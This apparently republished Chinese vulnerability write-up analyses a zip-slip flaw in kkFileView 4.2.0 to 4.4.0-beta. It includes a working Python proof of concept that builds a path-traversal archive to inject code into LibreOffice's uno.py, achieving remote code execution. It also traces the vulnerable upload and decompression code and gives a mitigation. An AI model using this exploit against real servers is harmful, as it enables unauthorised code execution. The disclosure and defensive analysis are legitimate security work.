关注我们❤️,添加星标🌟,一起学安全! 作者:niko@Timeline Sec 本文字数:1774 阅读时长:2~3min 声明:仅供学习参考使用,请勿用作违法用途,否则后果自负
Keking kkFileView是中国凯京科技(Keking)公司的一个 Spring-Boot 打造文件文档在线预览项目。kkFileViewv4.2.0至v4.4.0-beta版本之间存在安全漏洞,该漏洞源于组件CompressFilePreviewImpl#filePreviewHandle
存在zipslip漏洞,允许攻击者通过将精心制作的zip压缩包来覆盖任意文件,进而造成RCE危害。
kkFileViewv4.2.0至v4.4.0-beta版本之间存在安全漏洞,该漏洞源于组件CompressFilePreviewImpl#filePreviewHandle
存在zipslip漏洞,允许攻击者通过将精心制作的zip压缩包来覆盖任意文件,进而造成RCE危害。
v4.2.0<= kkFileView <= v4.4.0-beta
linux压缩包地址如下:
https://resource.kkview.cn/kkFileView-4.3.0.tar.gz
三个文件:zip.py exp.txt sec.txt
同目录保存文件如下,其中sec.txt为任意内容即可:
zip.py
import zipfile
zipName = r"exp.zip"
fileName = r"sec.txt"
fileName2 = r"exp.txt"
zf = zipfile.ZipFile(zipName, 'w')
zf.write(fileName,'sec.txt') #fileName 文件名,sec.txt 压缩路径名称
zf.write(fileName2,'../../../../../../../../../../../../../../../../../opt/libreoffice7.5/program/uno.py')
zf.close()
exp.txt:rce命令内容为创建/tmp/rce文件夹
import os
os.makedirs("/tmp/rce", exist_ok=True)
此时/tmp文件夹中无内容
python3 zip.py
生成exp.zip,上传zip压缩包后,点击预览
创建一个odt后缀文件,内容随意。上传后点击预览
成功执行命令
因为在线文件预览无法在线预览其他url的zip文件,所以漏洞率先定位到文件上传处 文件上传接口cn.keking.web.controller.FileController#fileUpload
在58行会调用fileUploadCheck
函数对文件类型、文件名及是否为同名文件做安全检查,这里我们上传文件为zip能正常通过,因此不继续跟进 68-70行实现文件上传,此时文件被上传至fileDir+demoPath
路径下
分析在线预览接口cn.keking.web.controller.OnlinePreviewController#onlinePreview
函数,步入62行
入参url通过WebUtils.decodeUrl\0
解密(普通的base64解码)
解码后的fileurl传入至67行
fileHandlerService.getFileAttribute
\0函数中,该函数内容为通过url来获取文件各项属性,如文件类型、文件名、缓存信息等,并返回FileAttribute
类
当预览的是zip压缩包时,FileAttribute.type
为COMPRESS
判断代码如下:
public enum FileType {
COMPRESS("compressFilePreviewImpl"),
...
// 匹配后缀是否在ARCHIVE_TYPES列表中
private static final String[] ARCHIVE_TYPES = {"rar", "zip", "jar", "7-zip", "tar", "gzip", "7z"};
private static final Map<String, FileType> FILE_TYPE_MAPPER = new HashMap<>();
...
static {
for (String archive : ARCHIVE_TYPES) {
FILE_TYPE_MAPPER.put(archive, FileType.COMPRESS);
}
}
x`
因此在filePreview.filePreviewHandle\0
接口会调用CompressFilePreviewImpl#filePreviewHandle
实现类
后续定位到cn.keking.service.impl.CompressFilePreviewImpl#filePreviewHandle
,先步入45行DownloadUtils#downLoad
中
当文件为压缩包时,直接返回fileDir + fileName
\0给response
,不进行文件下载(也就是最开始说的需要先进行文件上传才行)
之后,response
会将地址传递至cn.keking.service.CompressFileReader#unRar
作为解压路径
当我们传入构造好的zipslip压缩包,会发现unRar
函数未对解压路径进行处理,因此可以直接将文件通过路径穿越解压到任意文件夹下
当我们上传odt类型文件并预览时,会调用Libreoffice库中的uno.py文件。该文件默认地址位于:/opt/libreoffice7.5/program/uno.py
那么利用方式就是将poc解压到该文件下,即可执行恶意代码(解压后会追加文件内容,不会造成文件覆盖)
构造的zipslip压缩包需要包含一个正常文件。在漏洞挖掘时,初次使用的zipslip代码为
import zipfile
# the name of the zip file to generate
zf = zipfile.ZipFile('wrong2.zip', 'w')
# the name of the malicious file that will overwrite the origial file (must exist on disk)
fname = 'sec.txt'
#destination path of the file
zf.write(fname, '../../../../../../../../../../../../../../../../../tmp/secs.txt')
这时unRar
函数会创建如下文件夹,在../作用下,实际创建文件夹为/tmp,并没有创建wrong2.zip_文件夹,因此就导致了FIleNotFoundException
当zip压缩包包含一个正常文件时,会成功创建对应文件夹
存量受影响的版本建议开启 file.upload.disable=true 参数,禁用首页的上传文件,关闭演示入口来规避问题,等待新版本修复。
https://github.com/luelueking/kkFileView-v4.3.0-RCE-POC?tab=readme-ov-file
本文分享自 Timeline Sec 微信公众号,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文参与 腾讯云自媒体同步曝光计划 ,欢迎热爱写作的你一起参与!